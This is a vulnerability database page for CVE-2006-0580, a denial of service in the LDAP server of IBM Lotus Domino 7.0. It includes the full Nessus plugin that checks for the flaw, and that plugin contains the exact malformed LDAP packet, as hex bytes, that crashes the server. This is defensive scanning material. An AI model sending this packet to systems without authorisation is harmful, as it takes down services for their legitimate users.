Vulnerabilities > CVE-2006-0580 - Denial of Service vulnerability in IBM Lotus Domino Server 7.0

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
ibm
nessus
NVD
Published: 2006-02-08
Updated: 2017-07-20

Summary

IBM Lotus Domino Server 7.0 allows remote attackers to cause a denial of service (segmentation fault) via a crafted packet to the LDAP port (389/TCP).

Vulnerable Configurations

Part Description Count
Application
Ibm
1

Nessus

NASL familyDenial of Service
NASL idLOTUS_DOMINO_LDAP_DOS.NASL
descriptionThe LDAP server on the remote host appears to have crashed after being sent a malformed request. The specific request used is known to crash the LDAP server in Lotus Domino 7.0. By leveraging this flaw, an attacker may be able to deny service to legitimate users.
last seen2020-06-01
modified2020-06-02
plugin id20890
published2006-02-13
reporterThis script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/20890
titleLotus Domino LDAP Server Crafted Packet Remote DoS
code
#
# (C) Tenable Network Security, Inc.
#

# This flaw in Lotus Domino 7.0 was discovered by Evgeny Legerov and 
# published on the Dalily Dave mailing list
#
# References:
# From: "Evgeny Legerov" <[email protected]>
# To: [email protected]
# Date: Sat, 04 Feb 2006 04:33:53 +0300
# Message-ID: <[email protected]>
# Subject: [Dailydave] ProtoVer vs Lotus Domino Server 7.0
#

include("compat.inc");

if (description)
{
 script_id(20890);
 script_version("1.17");
 script_cvs_date("Date: 2018/11/15 20:50:21");

 script_cve_id("CVE-2006-0580");
 script_bugtraq_id(16523);

 script_name(english:"Lotus Domino LDAP Server Crafted Packet Remote DoS");
 script_summary(english:"Sends a malformed request to the remote Lotus Domino LDAP server");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote LDAP server is affected by a denial of service
vulnerability.");
 script_set_attribute(attribute:"description", value:
"The LDAP server on the remote host appears to have crashed after being
sent a malformed request.  The specific request used is known to crash
the LDAP server in Lotus Domino 7.0.  By leveraging this flaw, an
attacker may be able to deny service to legitimate users.");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/dailydave/2006/q1/110");
 script_set_attribute(attribute:"solution", value:
"Unknown at this time.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"plugin_publication_date", value:"2006/02/13");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:lotus_domino");
 script_end_attributes();
 
 script_category(ACT_DENIAL);
 script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");
 script_family(english:"Denial of Service");
 script_dependencie("find_service1.nasl", "ldap_detect.nasl", "external_svc_ident.nasl");
 script_require_ports("Services/ldap", 389);
 exit(0);
}

#

port = get_kb_item("Services/ldap");
if ( ! port ) port = 389;

if (! get_port_state(port)) exit(0);

s = open_sock_tcp(port);
if (!s) exit(0);

send(socket: s, data: '\x30\x0c\x02\x01\x01\x60\x07\x02\x00\x03\x04\x00\x80\x00');
res = recv(socket:s, length:1024);
close(s);

if (res == NULL) {
  sleep(1);
  s = open_sock_tcp(port);
  if (s) close(s);
  else security_warning(port);
}

References